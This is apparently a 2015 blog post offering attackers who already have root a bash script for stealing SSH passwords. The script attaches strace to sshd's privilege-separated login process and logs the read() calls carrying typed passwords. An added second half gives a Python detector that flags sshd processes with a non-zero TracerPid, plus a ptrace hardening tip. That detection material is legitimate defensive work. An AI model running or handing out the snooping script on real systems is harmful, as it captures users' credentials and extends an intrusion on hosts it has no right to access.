Thursday, October 1, 2015

SSH Snooping in action

Got root via a local privilege escalation exploit? Want the user's password, but can't crack it?

You may try SSH snooping. The script below watches for the privilege-separated sshd child that handles an incoming login, attaches strace to it to record its read() calls, and keeps only the reads from file descriptor 6 (where the typed password arrives), saving them to a root-only log file:

```bash
#!/bin/bash

while true; do
   # look for an sshd "[priv]" child (one appears per login attempt)
   ps_test=`ps ax|grep sshd|grep -v grep|grep priv|tr -s ' '`
   if [ -n "$ps_test" ]
   then
     f=$RANDOM
     a="output$RANDOM.log"
     # attach to the child's PID and record its read() syscalls until it exits
     strace -e trace=read -p $(echo $ps_test | awk '{print $1}') -o $f
     # keep only reads on fd 6, then drop the raw trace
     cat $f | grep 'read(6,' > $a
     rm $f
     chown root:root $a
     chmod 600 $a
   else
     echo -e ".\c"
     sleep 0.1
   fi
done
```
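From the defender's side, the tell-tale of this technique is a tracer attached to sshd: Linux records it in the `TracerPid` field of `/proc/<pid>/status` (0 when untraced). The following detection script is an added example, not part of the original post; it parses those status files, flags traced processes by name, and the `SAMPLE` dictionary is constructed input standing in for a live `/proc` tree. Setting `kernel.yama.ptrace_scope=3` additionally blocks ptrace attachment system-wide until reboot.

```python
#!/usr/bin/env python3
"""Detect ptrace tracers attached to sshd (or other) processes via /proc.

Added example, not from the original post. TracerPid in /proc/<pid>/status
is 0 for an untraced process, otherwise the PID of the tracing process.
"""
import os
import re

# one "Key:<whitespace>value" pair per line in /proc/<pid>/status
STATUS_RE = re.compile(r"^(\w+):\s*(.*)$", re.MULTILINE)


def parse_status(text):
    """Parse the body of a /proc/<pid>/status file into a dict."""
    return {k: v.strip() for k, v in STATUS_RE.findall(text)}


def traced_by(status):
    """Return the tracer PID from a parsed status dict, 0 if untraced."""
    return int(status.get("TracerPid", "0"))


def find_traced(statuses, names=("sshd",)):
    """Given {pid: status_text}, return sorted [(pid, name, tracer_pid)]
    for traced processes whose Name is in `names`."""
    hits = []
    for pid, text in statuses.items():
        st = parse_status(text)
        tracer = traced_by(st)
        if tracer and st.get("Name") in names:
            hits.append((pid, st["Name"], tracer))
    return sorted(hits)


def scan_proc(proc="/proc", names=("sshd",)):
    """Walk a live /proc tree and return traced processes of interest."""
    statuses = {}
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc, entry, "status")) as fh:
                statuses[int(entry)] = fh.read()
        except OSError:
            continue  # process exited, or not readable by this user
    return find_traced(statuses, names)


# Constructed sample: two sshd processes, one of them being traced by PID 4242.
SAMPLE = {
    1234: "Name:\tsshd\nState:\tS (sleeping)\nTracerPid:\t0\nUid:\t0\t0\t0\t0\n",
    1300: "Name:\tsshd\nState:\tt (tracing stop)\nTracerPid:\t4242\nUid:\t0\t0\t0\t0\n",
    1301: "Name:\tbash\nState:\tt (tracing stop)\nTracerPid:\t4242\n",
}

if __name__ == "__main__":
    for pid, name, tracer in scan_proc():
        print(f"ALERT: {name} pid {pid} is being traced by pid {tracer}")
```

Run it from cron or a monitoring agent as root so every process's status file is readable; a non-zero `TracerPid` on sshd outside of a deliberate debugging session warrants an incident response look.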